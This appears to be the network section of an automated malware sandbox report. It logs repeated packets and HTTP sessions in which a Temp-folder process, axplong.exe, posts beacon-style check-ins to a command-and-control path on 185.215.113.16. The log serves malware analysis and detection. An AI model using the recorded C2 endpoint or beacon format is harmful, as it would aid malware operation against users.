                  Sep 26, 2024 19:52:33.871867895 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.880419016 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:33.885248899 CEST8049739185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:34.102134943 CEST8049739185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:34.102236032 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.209424973 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.209758997 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.214945078 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:34.215060949 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.215152025 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.215415955 CEST8049739185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:34.215472937 CEST4973980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:34.220011950 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.006129980 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.006268024 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.006886005 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.011723042 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.235718966 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.235821962 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.350006104 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.350346088 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.355148077 CEST8049740185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.355206966 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:35.355212927 CEST4974080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.355285883 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.355457067 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:35.360191107 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.056668043 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.056900024 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.057486057 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.062324047 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.279582024 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.279822111 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.381009102 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.381306887 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.386137009 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.386225939 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.386301041 CEST8049741185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:36.386357069 CEST4974180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.386394024 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:36.391185045 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.156671047 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.156845093 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.157522917 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.162341118 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.409873009 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.409960032 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.522041082 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.522371054 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.527290106 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.527311087 CEST8049742185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:37.527411938 CEST4974280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.527626991 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.527626991 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:37.532473087 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.222038984 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.222165108 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.223140001 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.228023052 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.445768118 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.445889950 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.555465937 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.555896044 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.560914993 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.560992956 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.561055899 CEST8049743185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:38.561131001 CEST4974380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.561274052 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:38.566255093 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.263372898 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.263499022 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.264466047 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.269301891 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.486574888 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.486670971 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.600017071 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.600354910 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.606002092 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.606123924 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.606157064 CEST8049744185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:39.606213093 CEST4974480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.606348991 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:39.612334013 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.306037903 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.306111097 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.306946039 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.312083960 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.533605099 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.533730030 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.646593094 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.646888018 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.651668072 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.651757002 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.651763916 CEST8049745185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:40.651809931 CEST4974580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.651848078 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:40.657934904 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.340588093 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.340699911 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.341696978 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.346489906 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.563433886 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.563532114 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.678320885 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.678666115 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.684648991 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.684734106 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.684864044 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.684987068 CEST8049746185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:41.685044050 CEST4974680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:41.689750910 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.398369074 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.398461103 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.399060011 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.403811932 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.638597965 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.638691902 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.740891933 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.741214037 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.746093988 CEST8049747185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.746105909 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:42.746170998 CEST4974780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.746218920 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.746433020 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:42.751161098 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.504317999 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.504452944 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.505405903 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.510257959 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.728470087 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.728549957 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.834189892 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.834489107 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.965178967 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.965290070 CEST8049748185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:43.965302944 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.965343952 CEST4974880192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.965764999 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:43.971256018 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:44.760117054 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:44.760236979 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:44.760895014 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:44.766201019 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.018640041 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.018870115 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.131184101 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.131491899 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.136393070 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.136406898 CEST8049749185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.136487007 CEST4974980192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.136507034 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.136738062 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.141671896 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.872601986 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:45.872667074 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.873878002 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:45.878693104 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.102363110 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.102474928 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.216706991 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.217031002 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.221929073 CEST8049750185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.221942902 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.222141027 CEST4975080192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.222201109 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.222337961 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.227139950 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.929013968 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:46.929244995 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.929982901 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:46.935134888 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:47.157448053 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:47.157531977 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.271894932 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.272238016 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.277086973 CEST8049751185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:47.277169943 CEST4975180192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.277283907 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:47.277354956 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.277502060 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:47.282403946 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.001543045 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.001658916 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.002345085 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.007093906 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.234405041 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.234452963 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.351175070 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.351701975 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.356355906 CEST8049752185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.356401920 CEST4975280192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.356966972 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:48.357021093 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.357139111 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:48.362245083 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.080169916 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.080259085 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.081532001 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.086327076 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.308681965 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.308816910 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.427997112 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.428323984 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.433238983 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.433254004 CEST8049753185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:49.433449984 CEST4975380192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.433484077 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.433639050 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:49.438405991 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.126606941 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.126735926 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.127507925 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.132399082 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.351277113 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.351603031 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.459295034 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.459621906 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464596033 CEST8049754185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.464610100 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:50.464668036 CEST4975480192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464708090 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.464840889 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:50.469655037 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.179711103 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.179836035 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.180469036 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.185270071 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.407063961 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.407212973 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.591872931 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.592415094 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.597754955 CEST8049755185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.597820997 CEST4975580192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.597901106 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:51.597966909 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.602061987 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:51.606897116 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.312113047 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.312263012 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.313121080 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.319643021 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.541975975 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.542072058 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.648647070 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.648951054 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.655122042 CEST8049756185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.655210018 CEST4975680192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.655659914 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:52.655839920 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.656029940 CEST4975780192.168.2.5185.215.113.16
                  Sep 26, 2024 19:52:52.661660910 CEST8049757185.215.113.16192.168.2.5
                  Sep 26, 2024 19:52:53.356956959 CEST8049757185.215.113.16192.168.2.5
                  • 185.215.113.16
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.5 | 49712 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:03.644375086 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:04.364855051 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:04.367322922 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:04.599431992 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.5 | 49713 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:04.714777946 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:05.430788040 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:05.431557894 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:05.664062977 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.5 | 49714 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:05.777435064 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:06.488980055 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:06.490010977 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:06.747865915 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.5 | 49715 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:06.855494022 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
